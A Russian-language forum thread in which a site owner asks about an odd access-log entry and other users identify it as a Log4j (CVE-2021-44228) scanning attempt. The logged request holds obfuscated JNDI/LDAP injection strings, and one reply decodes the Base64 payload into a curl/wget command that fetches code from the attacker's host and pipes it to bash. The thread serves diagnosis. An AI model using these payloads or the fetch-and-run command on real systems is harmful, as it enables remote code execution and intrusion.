Странная строка в логе

iccup
На сайте с 01.05.2016
Offline
136
339
195.54.160.149 - - [18/Dec/2021:11:11:29 +0300] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNDkuNTYuMzAuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE0OS41Ni4zMC4xMzY6ODApfGJhc2g=} HTTP/1.0" 200 12051 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNDkuNTYuMzAuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE0OS41Ni4zMC4xMzY6ODApfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNDkuNTYuMzAuMTM2OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE0OS41Ni4zMC4xMzY6ODApfGJhc2g=}"
увидел в логах, код ответа 200, поэтому решило спросить на форуме.
kimsufi.com ( https://www.kimsufi.com ) очень дешевые и качественные дедики https://antibot.cloud/ - антибот, использую уже 3 года
Mik Foxi
На сайте с 02.03.2011
Offline
971
#1
Какаято уязвимость всплыла, возможно связанная с Log4j (CVE-2021-44228), потому этой фигней сейчас всех спамят.
Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ru.html
W1
На сайте с 22.01.2021
Online
113
#2
iccup :
код ответа 200

Код ответа у вас может такой выдаваться, потому что просто показывается главная страница при запросе с произвольным параметром. Этот вопрос вас должен волновать только с точки зрения появления дублей при определённых условиях.

По поводу самой уязвимости - если вы не используете на сервере приложений Java, то не парьтесь.

Мой форум - https://webinfo.guru –Там я всегда на связи
Mik Foxi
На сайте с 02.03.2011
Offline
971
#3
webinfo #:
Код ответа у вас может такой выдаваться, потому что просто показывается главная страница при запросе с произвольным параметром.

да тег рел каноникал главное при таком иметь и никаких проблем.

dr.AMik
На сайте с 06.09.2006
Offline
153
#4
(curl -s 195.54.160.149:5874/149.56.30.136:80||wget -q -O- 195.54.160.149:5874/149.56.30.136:80)|bash

выполняется команда, которая зашифрована алгоритмом Base64

☑ Естеств. ссылки (крауд, вопросники, отзовники, блоги) от 45р./шт. ( http://bit.ly/webcrowd2021 ) / ☑ Отчеты Serpstat/Ahrefs по 40р./сайт. @seogikua / ☑ https://bit.ly/IndexYaGoo Ускорение индексации NEW!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий